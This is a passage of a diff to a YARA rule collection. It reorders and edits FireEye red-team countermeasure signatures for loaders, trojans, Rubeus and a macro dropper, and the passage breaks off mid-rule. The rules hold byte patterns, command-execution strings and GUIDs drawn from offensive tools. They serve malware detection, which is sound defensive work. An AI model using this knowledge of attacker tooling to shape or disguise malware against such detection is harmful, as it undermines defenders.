-		$cond4 = { 8B FF 55 8B EC 81 EC 3? ?1 ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 E0 56 C7 45 F8 ?? ?? ?? ?? C6 85 D8 FE FF FF ?? 68 ?? ?? ?? ?? 6A ?? 8D 85 D9 FE FF FF 50 E8 ?? ?? ?? ?? 83 C4 0C C7 45 F4 ?? ?? ?? ?? C6 45 E7 ?? C7 45 E8 ?? ?? ?? ?? C7 45 EC ?? ?? ?? ?? C7 45 FC ?? ?? ?? ?? C7 45 F? ?? ?? ?? ?0 6A ?? 6A ?? 8D 8D D8 FE FF FF 51 6A ?? 68 ?? ?? ?? ?? 8B ?? ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 89 45 F8 6A ?? FF ?? ?? ?? ?? ?? 83 C4 04 89 45 E8 8B 45 F8 8A 48 04 88 4D E7 8B 55 F8 83 ?? ?? 8B 45 E8 8B 0A 89 08 8B 4A 04 89 48 04 8B 4A 08 89 48 08 8B 4A 0C 89 48 0C 8B 52 10 89 50 10 C7 85 D4 FE FF FF ?? ?? ?? ?? EB ?? 8B 85 D4 FE FF FF 83 C? ?1 89 85 D4 FE FF FF 83 BD D4 FE FF FF 14 7D ?? 8B 4D E8 03 8D D4 FE FF FF 0F B6 11 0F B6 45 E7 33 D0 8B 4D E8 03 8D D4 FE FF FF 88 11 EB ?? 8B 55 F8 8B 42 08 89 45 FC 6A ?? 68 ?? ?? ?? ?? 8B 4D FC 51 6A ?? FF ?? ?? ?? ?? ?? 89 45 EC 8B 55 FC 52 8B 45 F8 83 ?? ?? 50 8B 4D EC 51 E8 ?? ?? ?? ?? 83 C4 0C C7 85 D0 FE FF FF ?? ?? ?? ?? EB ?? 8B 95 D0 FE FF FF 83 C2 01 89 95 D0 FE FF FF 8B 85 D0 FE FF FF 3B 45 FC 73 ?? 8B 4D EC 03 8D D0 FE FF FF 0F B6 09 8B 85 D0 FE FF FF 99 BE ?? ?? ?? ?? F7 FE 8B 45 E8 0F B6 14 10 33 CA 8B 45 EC 03 85 D0 FE FF FF 88 08 EB ?? 8B 4D EC 89 4D F0 FF ?? ?? 5E 8B 4D E0 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 }
+		$1 = "initialize" fullword
+		$2 = "getData" fullword
+		$3 = "putData" fullword
+		$4 = "fini" fullword
+		$5 = "Cookie: SID1=%s" fullword
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x010B ) and any of them
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule FIREEYE_RT_APT_Loader_Win32_PGF_1 : FILE
+rule FIREEYE_RT_APT_Downloader_Win32_REDFLARE_1 : FILE
 {
 	meta:
-		description = "base dlls: /lib/payload/techniques/unmanaged_exports/"
+		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "1af4f2ce-c540-5836-a749-43a0b08609b1"
-		date = "2020-11-25"
-		date = "2020-11-25"
+		id = "e8d7ee31-568e-58ac-98ad-49baa2eb37ea"
+		date = "2020-11-27"
+		date = "2020-11-27"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PGF/production/yara/APT_Loader_Win32_PGF_1.yar#L4-L19"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Downloader_Win32_REDFLARE_1.yar#L4-L17"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "383161e4deaf7eb2ebeda2c5e9c3204c"
-		logic_hash = "d3fb0bd7b678b19ee2e0e846f4e13e4ce7e2629ecda123f34ef52f2af42d2a8e"
+		hash = "05b99d438dac63a5a993cea37c036673"
+		logic_hash = "a340a2a732a9b1aa74ca9d84009a88d1b14b6a03140a859384c0d6e745e4a90a"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		rev = 1
 
 	strings:
-		$sb1 = { 6A ?? FF 15 [4-32] 8A ?? 04 [0-32] 8B ?? 89 ?? 8B [2] 89 [2] 8B [2] 89 ?? 08 8B [2] 89 [2] 8B [2] 89 [2-64] 8B [5] 83 ?? 01 89 [5] 83 [5-32] 0F B6 [1-2] 0F B6 [1-2] 33 [1-16] 88 ?? EB }
-		$sb2 = { 6A 40 [0-32] 68 00 30 00 00 [0-32] 6A 00 [0-16] FF 15 [4-32] 89 45 [4-64] E8 [4-32] 83 ?? 01 [4-80] 0F B6 [1-64] 33 [1-32] 88 [2-64] FF ( D? | 55 ) }
-		$sb3 = { 8B ?? 08 03 ?? 3C [2-32] 0F B? ?? 14 [0-32] 8D [2] 18 [2-64] 0F B? ?? 06 [3-64] 6B ?? 28 }
+		$const = "Cookie: SID1=%s" fullword
+		$http_req = { 00 00 08 80 81 3D [4] BB 01 00 00 75 [1-10] 00 00 80 00 [1-4] 00 10 00 00 [1-4] 00 20 00 00 89 [1-10] 6A 00 8B [1-8] 5? 6A 00 6A 00 6A 00 8B [1-8] 5? 68 [4] 8B [1-8] 5? FF 15 [4-40] 6A 14 E8 }
 
 	condition:
 		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x010B ) and all of them
 }
-rule FIREEYE_RT_APT_Loader_Win64_PGF_2 : FILE
+rule FIREEYE_RT_APT_Loader_Raw32_REDFLARE_1 : FILE
 {
 	meta:
-		description = "base dlls: /lib/payload/techniques/dllmain/"
+		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "5253cb2a-28fd-57ab-be3d-f11cf2ea24cf"
-		date = "2020-11-25"
-		date = "2020-11-25"
+		id = "8f8ec27f-afac-5da5-b76f-b984e14e0066"
+		date = "2020-11-27"
+		date = "2020-11-27"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PGF/production/yara/APT_Loader_Win64_PGF_2.yar#L4-L19"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Loader_Raw32_REDFLARE_1.yar#L4-L16"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "4326a7e863928ffbb5f6bdf63bb9126e"
-		logic_hash = "074f6d9ad78ecd4dd8e3d0b5c8b0f61a48374f3935b85c4222305b207b447ec7"
+		hash = "4022baddfda3858a57c9cbb0d49f6f86"
+		logic_hash = "05ed89bd82600b4d5ef01ece2e0a9bd84e968988fd2bda1bab4ec316a9a9906b"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		rev = 2
+		rev = 1
 
 	strings:
-		$sb1 = { B9 [4] FF 15 [4-32] 8B ?? 1C [0-16] 0F B? ?? 04 [0-64] F3 0F 6F 00 [0-64] 66 0F EF C8 [0-64] F3 0F 7F 08 [0-64] 30 ?? 48 8D 40 01 48 83 ?? 01 7? }
-		$sb2 = { 44 8B ?? 08 [0-32] 41 B8 00 30 00 00 [0-16] FF 15 [4-32] 48 8B C8 [0-16] E8 [4-64] 4D 8D 49 01 [0-32] C1 ?? 04 [0-64] 0F B? [2-16] 41 30 ?? FF 45 3? ?? 7? }
-		$sb3 = { 63 ?? 3C [0-16] 03 [1-32] 0F B? ?? 14 [0-16] 8D ?? 18 [0-16] 03 [1-16] 66 ?? 3B ?? 06 7? [1-64] 48 8D 15 [4-32] FF 15 [4-16] 85 C0 [2-32] 41 0F B? ?? 06 }
+		$load = { EB ?? 58 [0-4] 8B 10 8B 48 [1-3] 8B C8 83 C1 ?? 03 D1 83 E9 [1-3] 83 C1 [1-4] FF D? }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x020B ) and all of them
+		( uint16( 0 ) != 0x5A4D ) and all of them
 }
-rule FIREEYE_RT_APT_Loader_Win64_PGF_5 : FILE
+rule FIREEYE_RT_APT_Trojan_Linux_REDFLARE_1 : FILE
 {
 	meta:
-		description = "PGF payload, generated rule based on symfunc/8167a6d94baca72bac554299d7c7f83c"
+		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "4fa4a1d6-cb63-582d-801c-b4c89c44d9ca"
-		date = "2020-12-08"
+		id = "220302bc-4ed3-5e10-9bd2-a8ed2bdaef73"
+		date = "2020-12-02"
+		date = "2020-12-02"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PGF/production/yara/APT_Loader_Win64_PGF_5.yar#L4-L18"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/supplemental/yara/APT_Trojan_Linux_REDFLARE_1.yar#L4-L20"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "150224a0ccabce79f963795bf29ec75b"
-		logic_hash = "16495ad1e5ce4d4a79f4067f3d687911a1a0a3bfe4c6409ff9de4d111b1ddca6"
+		hash = "79259451ff47b864d71fb3f94b1774f3, 82773afa0860d668d7fe40e3f22b0f3e"
+		logic_hash = "282f11c4c86d88d05f11e92f5483701d9a54c2dd39f21316cd271aa78a338d0f"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		rev = 3
+		rev = 1
 
 	strings:
-		$cond1 = { 4C 89 44 24 18 89 54 24 10 48 89 4C 24 08 48 83 EC 38 48 8B 4C 24 40 FF 15 13 FA FF FF 8B 44 24 48 89 44 24 20 83 7C 24 20 01 74 02 EB 17 48 8B 44 24 40 48 89 05 66 23 00 00 48 8B 4C 24 40 FF 15 EB F9 FF FF B8 01 00 00 00 48 83 C4 38 C3 }
-		$cond2 = { 4C 89 44 24 18 89 54 24 10 48 89 4C 24 08 48 83 EC 38 48 8B 4C 24 40 FF 15 A3 FA FF FF 8B 44 24 48 89 44 24 20 83 7C 24 20 01 74 02 EB 17 48 8B 44 24 40 48 89 05 F6 20 00 00 48 8B 4C 24 40 FF 15 7B FA FF FF B8 01 00 00 00 48 83 C4 38 C3 }
-		$cond3 = { 4C 89 44 24 18 89 54 24 10 48 89 4C 24 08 48 83 EC 38 48 8B 4C 24 40 FF ?? ?? ?? ?? ?? 8B 44 24 48 89 44 24 20 83 7C 24 2? ?1 74 ?? EB ?? 48 8B 44 24 40 48 ?? ?? ?? ?? ?? ?? 48 8B 4C 24 40 FF ?? ?? ?? ?? ?? B8 01 ?? ?? ?? 48 83 C4 38 C3 }
-		$cond4 = { 4C 89 44 24 ?? 89 54 24 ?? 48 89 4C 24 ?? 48 83 EC 38 48 8B 4C 24 ?? FF 15 ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 83 7C 24 ?? 01 74 ?? EB ?? 48 8B 44 24 ?? 48 89 05 ?? ?? ?? ?? 48 8B 4C 24 ?? FF 15 ?? ?? ?? ?? B8 01 00 00 00 48 83 C4 38 C3 }
+		$s1 = "find_applet_by_name" fullword
+		$s2 = "bb_basename" fullword
+		$s3 = "hk_printf_chk" fullword
+		$s4 = "runCommand" fullword
+		$s5 = "initialize" fullword
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x020B ) and any of them
+		( uint32( 0 ) == 0x464c457f ) and all of them
 }
-rule FIREEYE_RT_APT_Loader_MSIL_PGF_2 : FILE
+rule FIREEYE_RT_APT_Trojan_Win_REDFLARE_6 : FILE
 {
 	meta:
-		description = "base.js, ./lib/payload/techniques/jscriptdotnet/jscriptdotnet_payload.py"
+		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "c5f2ec90-cd9b-53ce-893b-e44192fcd507"
-		date = "2020-11-25"
-		date = "2020-11-25"
+		id = "5875a9ec-c3ee-57f0-a430-4443db585def"
+		date = "2020-12-01"
+		date = "2020-12-01"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PGF/production/yara/APT_Loader_MSIL_PGF_2.yar#L4-L20"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/supplemental/yara/APT_Trojan_Win_REDFLARE_6.yar#L4-L20"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "7c2a06ceb29cdb25f24c06f2a8892fba"
-		logic_hash = "b962ea30c063009c0383e25edda3a65202bea4496d0d6228549dcea82bba0d03"
+		hash = "294b1e229c3b1efce29b162e7b3be0ab, 6902862bd81da402e7ac70856afbe6a2"
+		logic_hash = "1e6f8320e0c0b601fc72fa4d9c61e46adfbcd84638c97da5988ca848e036312a"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		rev = 1
+		rev = 2
 
 	strings:
-		$sb1 = { 2? 00 10 00 00 0A 1? 40 0? 72 [4] 0? 0? 28 [2] 00 0A 0? 03 28 [2] 00 0A 74 [2] 00 01 6F [2] 00 0A 03 1? 0? 74 [2] 00 01 28 [2] 00 0A 6? 0? 0? 28 [2] 00 06 D0 [2] 00 01 28 [2] 00 0A 1? 28 [2] 00 0A 79 [2] 00 01 71 [2] 00 01 13 ?? 0? 1? 11 ?? 0? 74 [2] 00 01 28 [2] 00 0A 28 [2] 00 0A 7E [2] 00 0A 13 ?? 1? 13 ?? 7E [2] 00 0A 13 ?? 03 28 [2] 00 0A 74 [2] 00 01 6F [2] 00 0A 03 1? 1? 11 ?? 11 ?? 1? 11 ?? 28 [2] 00 06 }
-		$ss1 = "\x00CreateThread\x00"
-		$ss2 = "\x00ScriptObjectStackTop\x00"
-		$ss3 = "\x00Microsoft.JScript\x00"
+		$s1 = "RevertToSelf" fullword
+		$s2 = "Unsuccessful" fullword
+		$s3 = "Successful" fullword
+		$s4 = "runCommand" fullword
+		$s5 = "initialize" fullword
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule FIREEYE_RT_Tool_MSIL_Sharpgrep_1 : FILE
+rule FIREEYE_RT_Hacktool_MSIL_Rubeus_1 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'SharpGrep' project."
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public Rubeus project."
 		author = "FireEye"
-		id = "c7569d33-f57d-5f9c-aa2a-78866c680b5b"
+		id = "0ca140ea-2b9f-5904-a4c0-8615229626f0"
 		date = "2020-12-08"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SHARPPGREP/production/yara/Tool_MSIL_SharpGrep_1.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/RUBEUS/production/yara/HackTool_MSIL_Rubeus_1.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "dd8805d0e470e59b829d98397507d8c2"
-		logic_hash = "c22bfc50b3ab3c4082006aad3c3c89684cffe1e429b001b0bb08758856a47d04"
+		hash = "66e0681a500c726ed52e5ea9423d2654"
+		logic_hash = "ad954f9922ab564d68cb4515b080f6ee69476a8d87f0038e2ae4c222f0e182d7"
 		score = 75
 		quality = 73
 		tags = "FILE"
-		rev = 1
+		rev = 4
 
 	strings:
-		$typelibguid0 = "f65d75b5-a2a6-488f-b745-e67fc075f445" ascii nocase wide
+		$typelibguid = "658C8B7F-3664-4A95-9572-A3E5871DFC06" ascii nocase wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5A4D and $typelibguid
 }
-rule FIREEYE_RT_APT_Hacktool_MSIL_NOAMCI_1 : FILE
+rule FIREEYE_RT_Trojan_Macro_RESUMEPLEASE_1
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'noamci' project."
+		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "48066258-528f-5a70-81e1-15d6dfd9ff4f"
-		date = "2020-12-08"
+		id = "068662f6-28b8-5538-8bc3-6506565305ae"
+		date = "2020-12-01"
+		date = "2020-12-01"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/NOAMCI/production/yara/APT_HackTool_MSIL_NOAMCI_1.yar#L4-L16"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/RESUMEPLEASE/production/yara/Trojan_Macro_RESUMEPLEASE_1.yar#L4-L21"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "dd8805d0e470e59b829d98397507d8c2"
-		logic_hash = "6278cfb4e9af20bbe943f4b99227c7fba276315a9f0059575b3ed4ef96a848c4"
+		hash = "d5d3d23c8573d999f1c48d3e211b1066"
+		logic_hash = "040457bc446e496431129ff4623ddda5d9c2ce339ba65a7fbe42114626f36c60"
 		score = 75
-		quality = 71
-		tags = "FILE"
-		rev = 4
+		quality = 75
+		tags = ""
+		rev = 1
 
 	strings:
-		$typelibguid0 = "7bcccf21-7ecd-4fd4-8f77-06d461fd4d51" ascii nocase wide
-		$typelibguid1 = "ef86214e-54de-41c3-b27f-efc61d0accc3" ascii nocase wide
+		$str00 = "For Binary As"
+		$str01 = "Range.Text"
+		$str02 = "Environ("
+		$str03 = "CByte("
+		$str04 = ".SpawnInstance_"
+		$str05 = ".Create("
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		all of them
 }
 rule FIREEYE_RT_APT_Loader_Win32_Dshell_3 : FILE
 {
@@ -78276,61 +78057,61 @@ rule FIREEYE_RT_APT_Loader_Win32_Dshell_3 : FILE
 	condition:
 		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x010B ) and all of them
 }
-rule FIREEYE_RT_APT_Loader_Win32_Dshell_2 : FILE
+rule FIREEYE_RT_APT_Loader_Win32_Dshell_1 : FILE
 {
 	meta:
 		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "ae34d547-d979-5ce2-bcf8-a5b4e4567de3"
+		id = "dad763bd-0e4a-542a-9920-ece11d23ce24"
 		date = "2020-11-27"
 		date = "2020-11-27"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/DSHELL/production/yara/APT_Loader_Win32_DShell_2.yar#L4-L21"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/DSHELL/production/yara/APT_Loader_Win32_DShell_1.yar#L4-L20"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "590d98bb74879b52b97d8a158af912af"
-		logic_hash = "958ff45add46c0a43e839e8007c1d9296ee89ddd8c045b8ec6b031b225207a6c"
+		hash = "12c3566761495b8353f67298f15b882c"
+		logic_hash = "79643f9c252765647d80f6fe1ee7bb698fbc6a6c3a0ff1fd819a09bff031907c"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		rev = 2
+		rev = 1
 
 	strings:
 		$sb1 = { 6A 40 68 00 30 00 00 [4-32] E8 [4-8] 50 [0-16] E8 [4-150] 6A FF [1-32] 6A 00 6A 00 5? 6A 00 6A 00 [0-32] E8 [4] 50 }
+		$sb2 = { FF 7? 0C B? [4-16] FF 7? 08 5? [0-12] E8 [4] 84 C0 74 05 B? 01 00 00 00 [0-16] 80 F2 01 0F 84 }
 		$ss1 = "\x00CreateThread\x00"
 		$ss2 = "base64.d" fullword
 		$ss3 = "core.sys.windows" fullword
-		$ss4 = "C:\\Users\\config.ini" fullword
-		$ss5 = "Invalid config file" fullword
 
 	condition:
 		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x010B ) and all of them
 }
-rule FIREEYE_RT_APT_Loader_Win32_Dshell_1 : FILE
+rule FIREEYE_RT_APT_Loader_Win32_Dshell_2 : FILE
 {
 	meta:
 		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "dad763bd-0e4a-542a-9920-ece11d23ce24"
+		id = "ae34d547-d979-5ce2-bcf8-a5b4e4567de3"
 		date = "2020-11-27"
 		date = "2020-11-27"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/DSHELL/production/yara/APT_Loader_Win32_DShell_1.yar#L4-L20"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/DSHELL/production/yara/APT_Loader_Win32_DShell_2.yar#L4-L21"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "12c3566761495b8353f67298f15b882c"
-		logic_hash = "79643f9c252765647d80f6fe1ee7bb698fbc6a6c3a0ff1fd819a09bff031907c"
+		hash = "590d98bb74879b52b97d8a158af912af"
+		logic_hash = "958ff45add46c0a43e839e8007c1d9296ee89ddd8c045b8ec6b031b225207a6c"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		rev = 1
+		rev = 2
 
 	strings:
 		$sb1 = { 6A 40 68 00 30 00 00 [4-32] E8 [4-8] 50 [0-16] E8 [4-150] 6A FF [1-32] 6A 00 6A 00 5? 6A 00 6A 00 [0-32] E8 [4] 50 }
-		$sb2 = { FF 7? 0C B? [4-16] FF 7? 08 5? [0-12] E8 [4] 84 C0 74 05 B? 01 00 00 00 [0-16] 80 F2 01 0F 84 }
 		$ss1 = "\x00CreateThread\x00"
 		$ss2 = "base64.d" fullword
 		$ss3 = "core.sys.windows" fullword
+		$ss4 = "C:\\Users\\config.ini" fullword
+		$ss5 = "Invalid config file" fullword
 
 	condition:
 		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x010B ) and all of them
@@ -78476,249 +78257,415 @@ rule FIREEYE_RT_APT_Backdoor_Win_Dshell_2 : FILE
 	condition:
 		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and filesize > 500KB and filesize > 700KB and all of ( $s* ) and 1 of ( $dlang* ) and not $ign1 and not $ign2
 }
-rule FIREEYE_RT_Loader_MSIL_Sharpy_1 : FILE
+rule FIREEYE_RT_APT_Loader_MSIL_PGF_2 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'SharPy' project."
+		description = "base.js, ./lib/payload/techniques/jscriptdotnet/jscriptdotnet_payload.py"
 		author = "FireEye"
-		id = "7c7bda22-bacc-5901-a650-a30c9cfcdee7"
-		date = "2020-12-08"
+		id = "c5f2ec90-cd9b-53ce-893b-e44192fcd507"
+		date = "2020-11-25"
+		date = "2020-11-25"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SHARPY/production/yara/Loader_MSIL_SharPy_1.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PGF/production/yara/APT_Loader_MSIL_PGF_2.yar#L4-L20"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "dd8805d0e470e59b829d98397507d8c2"
-		logic_hash = "0f73fab3905b4961b8dbeb120d45a34a2383ecdaae0296f38e34f8b7ab4aeee8"
+		hash = "7c2a06ceb29cdb25f24c06f2a8892fba"
+		logic_hash = "b962ea30c063009c0383e25edda3a65202bea4496d0d6228549dcea82bba0d03"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		rev = 1
 
 	strings:
-		$typelibguid0 = "f6cf1d3b-3e43-4ecf-bb6d-6731610b4866" ascii nocase wide
+		$sb1 = { 2? 00 10 00 00 0A 1? 40 0? 72 [4] 0? 0? 28 [2] 00 0A 0? 03 28 [2] 00 0A 74 [2] 00 01 6F [2] 00 0A 03 1? 0? 74 [2] 00 01 28 [2] 00 0A 6? 0? 0? 28 [2] 00 06 D0 [2] 00 01 28 [2] 00 0A 1? 28 [2] 00 0A 79 [2] 00 01 71 [2] 00 01 13 ?? 0? 1? 11 ?? 0? 74 [2] 00 01 28 [2] 00 0A 28 [2] 00 0A 7E [2] 00 0A 13 ?? 1? 13 ?? 7E [2] 00 0A 13 ?? 03 28 [2] 00 0A 74 [2] 00 01 6F [2] 00 0A 03 1? 1? 11 ?? 11 ?? 1? 11 ?? 28 [2] 00 06 }
+		$ss1 = "\x00CreateThread\x00"
+		$ss2 = "\x00ScriptObjectStackTop\x00"
+		$ss3 = "\x00Microsoft.JScript\x00"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule FIREEYE_RT_APT_Hacktool_MSIL_DTRIM_1 : FILE
+rule FIREEYE_RT_APT_Loader_Win64_PGF_5 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'dtrim' project, which is a modified version of SharpSploit."
+		description = "PGF payload, generated rule based on symfunc/8167a6d94baca72bac554299d7c7f83c"
 		author = "FireEye"
-		id = "9be695a1-6d18-5952-974c-96a30f035e7a"
+		id = "4fa4a1d6-cb63-582d-801c-b4c89c44d9ca"
 		date = "2020-12-08"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/DTRIM/production/yara/APT_HackTool_MSIL_DTRIM_1.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PGF/production/yara/APT_Loader_Win64_PGF_5.yar#L4-L18"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "dd8805d0e470e59b829d98397507d8c2"
-		logic_hash = "357c1f76631ec9ee342995cd12369fd9ff18c541bffe6f5464b1e8db45057196"
+		hash = "150224a0ccabce79f963795bf29ec75b"
+		logic_hash = "16495ad1e5ce4d4a79f4067f3d687911a1a0a3bfe4c6409ff9de4d111b1ddca6"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-		rev = 2
+		rev = 3
 
 	strings:
-		$typelibguid0 = "7760248f-9247-4206-be42-a6952aa46da2" ascii nocase wide
